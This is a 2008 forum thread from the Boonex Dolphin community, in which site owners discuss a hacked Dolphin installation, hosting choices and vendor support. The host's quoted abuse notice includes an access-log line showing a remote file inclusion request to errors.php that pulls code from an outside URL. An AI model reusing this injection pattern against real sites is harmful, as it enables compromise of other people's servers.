My Dolphin Site Was Hacked HELP!

djgenesis posted 22nd of July 2008 in Community Voice. 8 comments.

http://www.detroitgetdown.com

I got this email from my host.

It has come to our attention that your web space has been hacked:

217.199.218.32 - - [20/Jul/2008:15:22:58 -0400] "GET
/errors.php?error=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 200
2960 s237177352.onlinehome.us "-" "libwww-perl/5.805" "-"


--

The above was taken from your access logs.  It shows that errors.php was
used to perpetrate the hack.

Please contact the developers for this script/application.  You will
likely need to install a version update and/or security patch to prevent
further abuse.

 
Comments
·Oldest
·Top
Please login to post a comment.
PkChatzinc
I had the same thing last week and site still remains closed until the boonex guys can work it out. It hurts when you pay a 1000 bucks for something that is open to exploits.I hope the guys can and will sort it out soon.So beware all, this person hacks in through your php files and floods/spams other sites then your host just closes your site until it can be fixed.
DosDawg
what did you pay $1000 for? and you are on a shared hosting plan? get real, and you want boonex to fix this. its clearly written that you need to be on a minimum vps, with suggested dedicated server. so if you got hacked using a shared hosting plan, that as you have read from the other 200 or so posts of those who were hacked, if you are on a server with register globals on, then you will be hacked, and once the "server" is hacked, they still have access to your site, as it is part of see more a shared environment.

later
DosDawg
PkChatzinc
DosDawg
I paid a thousand for smart pro and I have a level 3 VPS with Hostforweb. Boonex Support emailed me saying they want a report of the exploits. I have sent them copy's and they are looking into it. I hope to have a answer soon.
sammie
the op is on shared hosting with 1and1.com
mscott
I posted the code two weeks ago to block all "libwww" bots from accessing your site... they are always sent by the bad guys.
gameutopia
Hosting company's get 1000's of exploits all the time, I don't mean to say they won't do anything, but chances are it's a no win situation. They have 1000's of pages of logs and to really go through it all for the little guy paying them $5 per month even $30 to $40 per month there really isn't much they will do. They will just tell you to secure and harden your site.

What it comes down to is no site is 100% hack proof. You need to read up and follow security measures. Just the way it is.

Even see more microsoft is far from hacker proof. So don't expect your host to secure your site. But they may help you restore files if they are decent.

Most of this can be prevented with following security threads, choosing a decent host from the beginning and keeping your dolphin up to date.
jview
in other words... boonex will sell u a 1000 dollar script with known vulnerabilities, so, when u get hacked, they upsell, ahem, recommend their hosting solution.

pretty cool.

am going to adopt that business practice too... =]
PkChatzinc
Well to put a nice note to this blog the Boonex guys went in and fixed my site and its up and running again.
I publicly thank them for there hard work.
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.075400114059448